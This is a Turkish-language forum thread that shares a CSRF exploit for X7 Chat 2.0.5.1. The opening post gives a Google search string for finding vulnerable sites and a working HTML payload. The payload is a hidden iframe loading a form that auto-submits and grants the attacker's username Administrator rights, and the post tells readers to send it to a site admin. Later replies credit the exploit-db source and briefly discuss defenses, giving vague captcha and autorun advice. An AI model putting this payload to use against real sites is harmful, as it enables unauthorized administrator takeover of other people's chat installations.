

X7 Chat 2.0.5.1 CSRF Add Admin Exploit
-
X7 Chat 2.0.5.1 CSRF Add Admin Exploit
Google Araması:intitle:"Chat Room" "Powered By X7 Chat 2.0.5"
Yazılım Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
Version:
Aşağıdaki kodları kendinize göre düzrnlersiniz her hangi bir yöneticiye aşşağıdaki kodlar frame içinde gönderirisiniz şu şekilde girdiğinde sis admin atamış olacak kolay gelsin
<iframe style="display:none;" src="frame.html"></iframe><br> //yukarıdaki şekilde frameli olarark aşşağıdaki kodları koyarsınız <html> <body onload="document.xform.submit();"> <form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post"> <input type="hidden" name="username" value="YOURUSERNAME" /> <input type="hidden" name="usergroup" value="Administrator" /> </form> </body> </html> -
-
SARI bunu yazdı:
-----------------------------paylaşım için teşekkürler :D
http://www.exploit-db.com/exploits/18850/
-----------------------------
Teşekkürler kaynağı belirttiğin için dur sana zahmet olmasın konuya ben iliştireyim o linki...
bana ait güvenlik açıklarını ekstradan belirtiyorum zaten ama genel güvenlik sitelerinde paylaşılan açıkların kaynaklarını belirtmeye gerek duymuyorum sadece burada bunun üzerine konuşulsun diye birde anlamayanlar vs olurdiye ekstra açıklama yapıyorum kimsenin açığına vs konma gibi durumum yok beni tanıyan tanır SARI anlaşılan sen daha tanımamaışsın beni... yakıştıramadım. -
Aman hocam boş yere gerginlik yaratmayın
Bu crsf yi önlemek için captcha dışında yöntemler kullanılabilirmi hocam ?
Yada bir scriptte csrf ararken adamlar neye dikkat edip exploit ediyor acaba
-
http://www.tahribat.com/Forum-Tahribat-Com-Changelog-36910/25/#1364030
Rene'nin bu mesajina sormak lazim, nasil yapit...Csrf meshur oldugunda kendi profilimde deniyordum ise yariyordu imzami degistirebiliyordum muridlerde denicektim ama sonra tirstim AB aliriz diye :)) her ne olduysa yukaridaki ayardan sonra artik is gormuyor :((
-
SARI bunu yazdı:
-----------------------------paylaşım için teşekkürler :D
http://www.exploit-db.com/exploits/18850/
-----------------------------Sarı'nın exploit yazması, yayınlaması dileğiyle :D Sağol Serdar
-
Twitter bunu yazdı:
-----------------------------Aman hocam boş yere gerginlik yaratmayın
Bu crsf yi önlemek için captcha dışında yöntemler kullanılabilirmi hocam ?
Yada bir scriptte csrf ararken adamlar neye dikkat edip exploit ediyor acaba
-----------------------------auto run a dikkat ediyor o bölümlen tanımlandıgında post ediyor scriptin için auto run of yaparsan csrf önlemiş olursun ama tamamen değil tamımı önlemek o sayfaya imaj sorugusu koymak en güvenlisi